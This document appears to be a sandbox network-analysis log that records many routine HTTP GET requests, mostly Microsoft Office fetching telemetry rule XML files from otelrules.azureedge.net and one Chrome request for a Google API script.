Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.x7CxCIZpks8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAg/rs=AHpOoo8czmnaLIncRgBQP7N2THncpDJ9mQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
